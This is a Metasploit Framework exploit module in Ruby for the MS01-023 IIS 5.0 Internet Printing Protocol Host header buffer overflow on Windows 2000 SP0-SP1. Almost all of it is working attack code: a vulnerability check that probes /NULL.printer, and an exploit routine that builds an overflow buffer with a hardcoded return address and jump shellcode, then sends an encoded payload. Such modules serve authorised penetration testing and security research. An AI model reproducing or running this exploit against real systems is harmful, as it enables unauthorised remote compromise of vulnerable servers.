|   1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115  |  ## # $Id: ms01_023_printer.rb 9179 2010-04-30 08:40:19Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote  Rank = GoodRanking  include Msf::Exploit::Remote::Tcp  def initialize(info = {})  super(update_info(info,  'Name' => 'Microsoft IIS 5.0 Printer Host Header Overflow',  'Description'=> %q{  This exploits a buffer overflow in the request processor of  the Internet Printing Protocol ISAPI module in IIS. This  module works against Windows 2000 service pack 0 and 1. If  the service stops responding after a successful compromise,  run the exploit a couple more times to completely kill the  hung process.  },  'Author' => [ 'hdm' ],  'License'=> MSF_LICENSE,  'Version'=> '$Revision: 9179 $',  'References' =>  [  [ 'CVE', '2001-0241'],  [ 'OSVDB', '3323'],  [ 'BID', '2674'],  [ 'MSB', 'MS01-023'],  [ 'URL', 'http://seclists.org/lists/bugtraq/2001/May/0005.html'],  ],  'Privileged' => false,  'Payload'=>  {  'Space'=> 900,  'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",  'StackAdjustment' => -3500,  },  'Targets'=>  [  [  'Windows 2000 English SP0-SP1',  {  'Platform' => 'win',  'Ret'=> 0x732c45f3,  },  ],  ],  'Platform' => 'win',  'DisclosureDate' => 'May 1 2001',  'DefaultTarget' => 0))  register_options(  [  Opt::RPORT(80)  ], self.class)  end  def check  connect  sock.put("GET /NULL.printer HTTP/1.0\r\n\r\n")  resp = sock.get_once  disconnect  if !(resp and resp =~ /Error in web printer/)  return Exploit::CheckCode::Safe  end  connect  sock.put("GET /NULL.printer HTTP/1.0\r\nHost: #{"X"*257}\r\n\r\n")  resp = sock.get_once  disconnect  if (resp and resp =~ /locked out/)  print_status("The IUSER account is locked out, we can't check")  return Exploit::CheckCode::Detected  end  if (resp and resp.index("HTTP/1.1 500") >= 0)  return Exploit::CheckCode::Vulnerable  end  return Exploit::CheckCode::Safe  end  def exploit  connect  buf = make_nops(280)  buf[268, 4] = [target.ret].pack('V')  # payload is at: [ebx + 96] + 256 + 64  buf << "\x8b\x4b\x60"# mov ecx, [ebx + 96]  buf << "\x80\xc1\x40"# add cl, 64  buf << "\x80\xc5\x01"# add ch, 1  buf << "\xff\xe1"# jmp ecx  sock.put("GET http://#{buf}/NULL.printer?#{payload.encoded} HTTP/1.0\r\n\r\n")  handler  disconnect  end end  |